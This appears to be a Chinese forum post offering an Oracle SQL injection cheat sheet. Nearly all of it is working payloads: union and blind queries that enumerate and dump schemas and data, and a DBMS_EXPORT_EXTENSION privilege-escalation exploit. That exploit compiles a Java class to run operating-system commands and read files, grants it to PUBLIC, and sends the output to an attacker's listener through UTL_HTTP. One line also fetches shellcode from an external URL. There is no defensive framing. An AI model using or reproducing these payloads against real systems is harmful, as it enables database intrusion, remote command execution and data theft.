|
本帖最后由 test 于 2015-1-24 13:01 编辑
注释符: --
不支持多句执行 支持联合查询
数据库名、表名、列名,全部大写。
length(字段)
ascii(substr(字段,N,1))
and (select count(*) from dual)>0-- 判断是否为oracle
order by n--
and 1=2 union select null,null,.....,null from dual-- 用N或者'N'代替null
and 1=2 union select null,(sql语句),.....,null from dual-- 在‘N’处改成(sql语句)
and (select count(*) from all_objects where object_name='UTL_HTTP')>0-- 判断是否支持UTL_HTTP(可知出口IP)
and UTL_HTTP.request('http://LocalIP:port'||(SQL语句))=1-- 远程发信息到本地、本地监听nc -vv -l -p 1234
SQL语句
select banner from sys.v_$version where rownum=1 查询oracle版本
select member from v$logfile where rownum=1 查询日志文件路径(可知windows或linux)
select utl_inaddr.get_host_address from dual 查询数据库监听IP
select instance_name from v$instance 查询sid
select name from v$database 查询当前数据库名
select sys_context ('userenv','current_user') from dual 查询数据库用户
select * from session_roles where rownum=1 查询当前用户权限
select * from session_roles where rownum=1 [and role<>'第一个权限名']
select table_name from user_tables where rownum=1 当前数据库第一个表段
select table_name||','||tablespace_name from user_tables where rownum=1 第一个表段,数据库(作验证,有可能不是v$database)
select table_name from user_tables where rownum=1 and table_name<>'第一个表段' 当前数据库第二个表段
select column_name from user_tab_columns where rownum=1 and table_name='表段' 表名对应的第一个字段
select column_name from user_tab_columns where rownum=1 and table_name='表段' and column_name<>'第一个字段' 表名对应的第二个字段
select 字段 from 表段 where rownum=1 暴第一行内容
select 字段 from 表段 where rownum=1 and 字段<>'第一行内容' 暴第二行内容
跨库
select owner from all_tables where rownum=1 查询第一个数据库名
select owner from all_tables where rownum=1 and owner<>'第一个数据库名' 查询第二个数据库名
select table_name from all_tables where rownum=1 and owner='数据库名' 查询对应数据库的第一个表名
select table_name from all_tables where rownum=1 and owner='数据库名' and table_name<>'第一个表名' 查询对应数据库的第二个表名
select column_name from all_tab_columns where rownum=1 and owner='数据库名' and table_name='表段' 表名对应的第一个字段
select column_name from all_tab_columns where rownum=1 and owner='数据库名' and table_name='表段' and column_name<>'第一个字段' 表名对应的第二个字段
select 字段 from 数据库.表段 where rownum=1 暴第一行内容
select 字段 from 数据库.表段 where rownum=1 and 字段<>'第一行内容' 暴第二行内容
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);多语句END;--','SYS',0,'1',0)--
如果'被转义,需要用chr()。
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||多语句||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0)=0--
如果多语句过长,可以把语句写到网站文件,然后用utl_http.request来取。
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);utl_http.request('http://www.guetsec.com/shellcode.txt');--','SYS',0,'1',0)--
创建JAVA包SecTest
runCMD用于执行系统命令
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE''''create or replace and compile java source named "SecTest" as import java.io.*; public class SecTest extends Object{public static String runCMD(String args){try{BufferedReader myReader=new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream())); String stemp,str="";while((stemp=myReader.readLine())!=null) str+=stemp+"\n";myReader.close();return str;}catch(Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual)--
readFile用于读取文件
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE''''create or replace and compile java source named "SecTest" as import java.io.*; public class SecTest extends Object{public static String readFile(String filename){try{BufferedReader myReader=new BufferedReader(new FileReader(filename));String stemp,str="";while((stemp=myReader.readLine())!=null) str+=stemp+"\n";myReader.close();return str;}catch(Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual)--
赋Java权限
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''PUBLIC'''''''',''''''''SYS:java.io.FilePermission'''''''',''''''''<<ALL FILES>>'''''''',''''''''execute'''''''');end;'''';END;'';END;--','SYS',0,'1',0) from dual)--
创建函数
SecRunCMD函数
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function SecRunCMD(p_cmd in varchar2) return varchar2 as language java name''''''''SecTest.runCMD(java.lang.String) return String'''''''';'''';END;'';END;--','SYS',0,'1',0) from dual)--
SecReadFile函数
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function SecReadFile(filename in varchar2) return varchar2 as language java name''''''''SecTest.readFile(java.lang.String) return String'''''''';'''';END;'';END;--','SYS',0,'1',0) from dual)--
赋public执行函数的权限
SecRunCMD赋权限
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on SecRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual)--
SecReadFile赋权限
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on SecReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual)--
检测函数是否创建成功
and (select count(*) from all_objects where object_name='SECRUNCMD')>0--
and (select count(*) from all_objects where object_name='SECREADFILE')>0--
执行命令
and '1'<>(select sys.SecRunCMD('执行命令') from dual)--
and '1'<>(select sys.SecReadFile('文件物理地址') from dual)--
或者
and 1=2 union select null,...,sys.SecRunCMD('执行命令'),...,null from dual--
and 1=2 union select null,...,sys.SecReadFile('文件物理地址'),...,null from dual--
或者
and '1'<>(select UTL_HTTP.request('http://LocalIP:port'||REPLACE(REPLACE(sys.SecRunCMD('执行命令'),' ',' '),'\n',' ')) from dual)--
and '1'<>(select UTL_HTTP.request('http://LocalIP:port'||REPLACE(REPLACE(sys.SecReadFile('文件物理地址'),' ',' '),'\n',' ')) from dual)--
删除函数
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''drop function SecRunCMD'''';END;'';END;--','SYS',0,'1',0) from dual)--
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''drop function SecReadFile'''';END;'';END;--','SYS',0,'1',0) from dual)-- |
上一篇:可不可以申请版主啊,需要什么条件啊下一篇:ORALCE获取主机名和IP地址
|